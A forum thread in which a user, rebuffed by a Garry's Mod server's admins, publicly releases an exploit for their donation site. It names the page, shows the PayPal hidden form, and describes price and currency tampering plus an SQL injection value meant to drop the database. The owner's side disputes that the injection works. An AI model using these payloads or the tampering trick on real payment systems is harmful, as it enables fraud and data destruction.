Well long story short, I found an exploit on -ICE-'s community website allowing people to perform SQL injections. I found this out simply by roaming on -ICE-'s website after being hired to fix a few errors on his DayZ (Garry's Mod gamemode made by Pheonix) server. Problem being when I contacted both the Owner and an Administrator on his Steam Community page, they are unwilling to help themselves. Thought I would share what put a smile on my face for trying to help people.
[code]
|-ICE-|✞Vin✞: what do you need?
Alex: That's a kind and totally not agressive way of starting a conversation with someone that can help you.
|-ICE-|✞Vin✞: Look man I have to keep lay low from unknown people
|-ICE-|✞Vin✞: What do you mean you can help me with something?
Alex: I worked with -ICE- on attempting to fix the DayZ server from the loot spawning problem. True I didn't end up fixing the problem that happened to fix it's self upon reinstallation, but that is not the point I wish to make.
Alex: There is an exploit on your servers that allows people (such as myself) to wipe your mysql databse. I would like to help you fix the problem.
|-ICE-|✞Vin✞: you're suspicious
|-ICE-|✞Vin✞: why do you look into this stuff
Alex: Would you like me to demonstrate?
|-ICE-|✞Vin✞: hold on a second
|-ICE-|✞Vin✞ is currently offline, they will receive your message the next time they log in.
|-ICE-|✞Vin✞ is now Online.
Alex: Shall we start this conversation again, this time not forgetting about social niceties?
|-ICE-|✞Vin✞: No, I don't trust people like this.
|-ICE-|✞Vin✞: Much less french internet terrorist
|-ICE-|✞Vin✞: if you want to wipe our damn database
Alex: I don't want to. This is why I am helping you prevent it from happening
|-ICE-|✞Vin✞: I know you are trying to scam us
Alex: Now perhaps you would like me to simply explain how someone might be capable of doing this?
|-ICE-|✞Vin✞: and I cant do anything about it myself
Alex: I ask for nothing in return, I am simply here to give you information, nothing more
|-ICE-|✞Vin✞: I don't why you contacted me personally
|-ICE-|✞Vin✞: Im sure you are.
Alex: I contacted you because you were online, and one of the admins on the -ICE- steam group
Alex: fine then. Don't say I didn't to help you.
Alex: I can give you a third chance to listen to what I have to say instead of being paranoid, but I doubt you will take me up on the opportunity.
Alex: I have tried contacting -ICE- about it himself after working with him on the DayZ loot files. He has failed to respond to me
Alex: So final time. Would you like to simple listen to how someone is able to perform such an attack? I am not asking for anything in return, you do not need to use this information if you don't want to. And on top of that I can give you credentials so you might be able to trust me for the few minutes I take out of my time to help you.
Alex: I will be contacting the player 'Yoobs'. You may warn him of what I have to say if you so wish.
[/code]
Alex: There is an exploit on your servers that allows people (such as myself) to wipe your mysql databse. [B][I][U]I would like to help you fix the problem.[/U][/I][/B]
|-ICE-|✞Vin✞: you're suspicious
|-ICE-|✞Vin✞: why do you look into this stuff
People like him make me want to support occult magic and satanism. I cannot understand how dumb someone can be in such a moment.
if i was in your place now, i'd just wipe the database by now since people like this piss me off very much
[QUOTE=Knoxed;46811162]if i was in your place now, i'd just wipe the database by now since people like this piss me off very much[/QUOTE]
Just for the fact he called me a 'french internet terrorist'. Never been called that before :v:
In all seriousness though I am going to give them a chance to fix it, and if they don't, release the exploit on their website, let them deal with the consequences.
Release it here instead
I've noticed a lot of server owners can get pretty aggressive with you if you try to suggest stuff, it makes me quite sad
most community owners are 5 year olds, dont bother helping them
[editline]28th December 2014[/editline]
is their community tag the same as their owners name? or does he just make his admins wear his name in their names...
Actually getting somewhere with helping them. But not before another episode of paranoia from another Admin:
[code]
Yoobs: Ok
Yoobs: Ive contacted him
Alex: Have you given him the link?
Yoobs: no
Yoobs: i didnt evne look
Yoobs: it was telling me to register to view the link
Alex: Well here's the gist of it
Yoobs: and why do i want to know whats you
Alex: http://puu.sh/dMPAl/b69e808b46.txt
Yoobs: Really
Yoobs: A link that tries to ban you
Yoobs: Nice one
Alex: Erm, no?
Yoobs: Step ahead there buddy
Alex: It's a link to a chat log xD
Yoobs: Just copy and paste
Yoobs: it
[/code]
[code]Yoobs: A link that tries to ban you[/code]
is he serious
[QUOTE=imacc2009;46811466][code]Yoobs: A link that tries to ban you[/code]
is he serious[/QUOTE]
probably due to hackers using puush
I wish people like you would come to my server instead of these groups of friends who think they're master trolls.
Well since the owner doesn't want to spend 2 minutes fixing it, here's the exploit.
[url=http://icedarkrp1.site.nfoservers.com/donate/index.php?page=checkout&game=gmod&server=darkrp&pid=4]This here[/url] is the donation system for their server. I have already selected a simple $1 item, but the price is irrelevant, as you will soon see, we can get any item for any amount. But that's not why we are here, we don't want to just abuse the system, we want to exploit the system.
So what now? Well as you can see, you can put in your SteamID. This is where the Owner had a tiny bit of sense and verifies the user's steamID. In fact it validates the steamID format, and then generates the 64bit version of it. This would normally mean we couldn't perform any SQL injections from simply putting in an un-escaped character. Once this is done it generates the paypal button, giving paypal all the information it needs to give back to the IPN.
[code]
<form action='https://www.paypal.com/cgi-bin/webscr' method='post' name='frmPayPal1'>
<input type='hidden' name='business' value='connorcoulson@yahoo.com'>
<input type='hidden' name='cmd' value='_xclick'>
<input type='hidden' name='item_name' value='DarkRP1 Donation - RecordWipe'>
<input type='hidden' name='item_number' value='4'>
<input type='hidden' name='amount' value='1'>
<input type='hidden' name='no_shipping' value='1'>
<input type='hidden' name='currency_code' value='USD'>
<input type='hidden' name='handling' value='0'>
<input type='hidden' name='custom' value='76561197960265728'>
<input type='hidden' name='cancel_return' value='http://icedarkrp1.site.nfoservers.com/donate/'>
<input type='hidden' name='return' value='http://icedarkrp1.site.nfoservers.com/donate/success.php'>
<input type='hidden' name='notify_url' value='http://icedarkrp1.site.nfoservers.com/donate/ipn.php'>
<input type="image" src="https://www.paypalobjects.com/en_US/i/btn/btn_xpressCheckout.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
</form>
[/code]
As long as we keep the IPN callback url the same, we can do what ever we want we the other values. This includes spending only $0.01 for any item (which actually ends up costing the server more than they receive, fun exploit in it's self). Anyway.
[code]
<input type='hidden' name='custom' value='76561197960265728'>
[/code]
This is what we are interested in. The donation system has already checked and validated the steamID, and generated it's own values. So naturally they think once the user input is finished, everything is dandy.
[code]
<input type='hidden' name='custom' value='`; DROP DATABASE() --'>
[/code]
Or something along those lines is pretty much what you would need to do to drop the database. As well as this, most donation systems will store records of transactions. This means we can probably do the same for the following fields
[code]
<input type='hidden' name='currency_code' value='USD'>
<input type='hidden' name='amount' value='1'>
[/code]
Or if we didn't want to spend $1 performing this exploit:
[code]
<input type='hidden' name='currency_code' value='JPY'>
<input type='hidden' name='amount' value='1'>
[/code]
Anyway. I hope I don't get banned for this, I have tried helping them out being a White Hat, now it's time to wear the Gray Hat.
Hey look my server XD but please annoy the stupidity of my Superadmins.. Thanks Ding for bringing this up to me, I've been super busy lately with Christmas and News years Eve stuff but I'm deifenlty interested in getting this fixed :P
Honestly those 'donation' packages deserve a database wipe.
[QUOTE=imacc2009;46811466][code]Yoobs: A link that tries to ban you[/code]
is he serious[/QUOTE]
Yeah im serious, people send you a link to a website that send a small udp packet to rcon and if you get the password wrong for rcon 3 times it bans you and the only way of unbanning someone is if you unban them through the server files.
[QUOTE=yoobs;46824056]Yeah im serious, people send you a link to a website that send a small udp packet to rcon and if you get the password wrong for rcon 3 times it bans you and the only way of unbanning someone is if you unban them through the server files.[/QUOTE]
How about you do something about it instead of fearing links? It's an easy fix.
[QUOTE=-ICE-;46823780]Hey look my server XD but please annoy the stupidity of my Superadmins.. Thanks Ding for bringing this up to me, I've been super busy lately with Christmas and News years Eve stuff but I'm deifenlty interested in getting this fixed :P[/QUOTE]
One can't just "annoy" the stupidy of the "Superadmins"
I'm going to assume you meant ignore.
However, they do display the quality of your server.
You may want to whip them in shape.
Nice, this is why paranoia gets you nowhere.
Also, it looks like all this could delete is the MySQL Database that the donation system is linked with. It's still insecure, but unless he has the donation system and the server files on the database it's not a major issue save for the fact that all temporary benefits will become permanent.
-snip-
[QUOTE=dingusnin;46823675]Well since the owner doesn't want to spend 2 minutes fixing it, here's the exploit.
[url=http://icedarkrp1.site.nfoservers.com/donate/index.php?page=checkout&game=gmod&server=darkrp&pid=4]This here[/url] is the donation system for their server. I have already selected a simple $1 item, but the price is irrelevant, as you will soon see, we can get any item for any amount. But that's not why we are here, we don't want to just abuse the system, we want to exploit the system.
So what now? Well as you can see, you can put in your SteamID. This is where the Owner had a tiny bit of sense and verifies the user's steamID. In fact it validates the steamID format, and then generates the 64bit version of it. This would normally mean we couldn't perform any SQL injections from simply putting in an un-escaped character. Once this is done it generates the paypal button, giving paypal all the information it needs to give back to the IPN.
...
Anyway. I hope I don't get banned for this, I have tried helping them out being a White Hat, now it's time to wear the Gray Hat.[/QUOTE]
Yet you haven't tested the exploit nor you know the background process, and you think you are a leet hacker...
[IMG]http://i.imgur.com/77NqUjF.png[/IMG]
[IMG]http://i.imgur.com/FLkfu8h.png[/IMG]
[b]In addition all mysql queries use prepared statements.[/b]
[code]
Alex: I worked with -ICE- on attempting to fix the DayZ server from the loot spawning problem. True I didn't end up fixing the problem that happened to fix it's self upon reinstallation, but that is not the point I wish to make.
[/code]
Nice to know. I guess the installation instructions weren't followed correctly again.
[QUOTE=Phoenixf129;46826335]
Nice to know. I guess the installation instructions weren't followed correctly again.[/QUOTE]
Dragging and dropping is too hard.
[QUOTE=Phoenixf129;46826335][code]
Alex: I worked with -ICE- on attempting to fix the DayZ server from the loot spawning problem. True I didn't end up fixing the problem that happened to fix it's self upon reinstallation, but that is not the point I wish to make.
[/code]
Nice to know. I guess the installation instructions weren't followed correctly again.[/QUOTE]
Hey I finally did fix it XD
Although this person went way to far and should have at-least listened to what you had to say, he more then likely only said that stuff in fear. I am not condoning what this person did but you have to look from both sides of the situation. If a server owner is just starting out and he doesn't know a lick of coding he is going to be cautious. He doesn't want someone coming onto his server pretending to be his friend and just hijacking his server. Especially with how the gmod community is right now with players ddosing servers, putting backdoors in addons , and leaking content. He be crazy not to be a little skeptical about it.
In hind sight this dude should have chilled out. I know if someone told me I had an exploit I wouldn't just sit there ignoring what they said.
Looks to me like they had a right to be suspicious of you.
Why didn't you just tell them what the problem is from the start, instead of dancing around acting like some hero who's going to save their servers?
That conversation read more like a thinly veiled threat than a genuine attempt at helping someone.
Why then would you post it publicly to spite them?
Can't believe people support this shit.
[QUOTE=kila58;46824145]How about you do something about it instead of fearing links? It's an easy fix.[/QUOTE]
And this fix is?
[QUOTE=Blasteh;46827938]Looks to me like they had a right to be suspicious of you.
Why didn't you just tell them what the problem is from the start, instead of dancing around acting like some hero who's going to save their servers?
That conversation read more like a thinly veiled threat than a genuine attempt at helping someone.
Why then would you post it publicly to spite them?
Can't believe people support this shit.[/QUOTE]
he called him a french internet terrorist and a scammer before he could even start
[editline]31st December 2014[/editline]
[QUOTE=yoobs;46828138]And this fix is?[/QUOTE]
disabling rcon and or disabling penalties?
did you even stop to think about it
LOL
please stop running a community
I'm the server owner actually, not Vin Diesel. So please don't get him confused. Its Christmas break and I'm out enjoying my time with my friends and having a real life, Alex did contact me about this but understand I get a 1000 messages a day and the only contact I really have are people who are on my Teamspeak. Now please stop being mean :P
[QUOTE=-ICE-;46839902]I'm the server owner actually, not Vin Diesel. So please don't get him confused. Its Christmas break and I'm out enjoying my time with my friends and having a real life, Alex did contact me about this but understand I get a 1000 messages a day and the only contact I really have are people who are on my Teamspeak. Now please stop being mean :P[/QUOTE]
Please stop being "mean" to you when you obviously can't take the 5 seconds out of your day to say "What's up? I'm busy, send me the messages and I'll get back to you later." and/or have an admin team competent enough to not only listen to people that want to help, but also bring the problem up with you if they're unsure of what to do. It seems like you just have a ton of retards running rampant in your servers that need your help on what to do whenever anything happens, this is not the way to run a community seeing as if you have everyone running to you for help, when you're not around to help the servers suffer severe hits. Myself and my friends rage cheated + exploited your DarkRP server for literally hours on end for weeks and nothing happened besides bans, the exploits weren't fixed until Deagler fixed them for you.
Sorry, you need to Log In to post a reply to this thread.
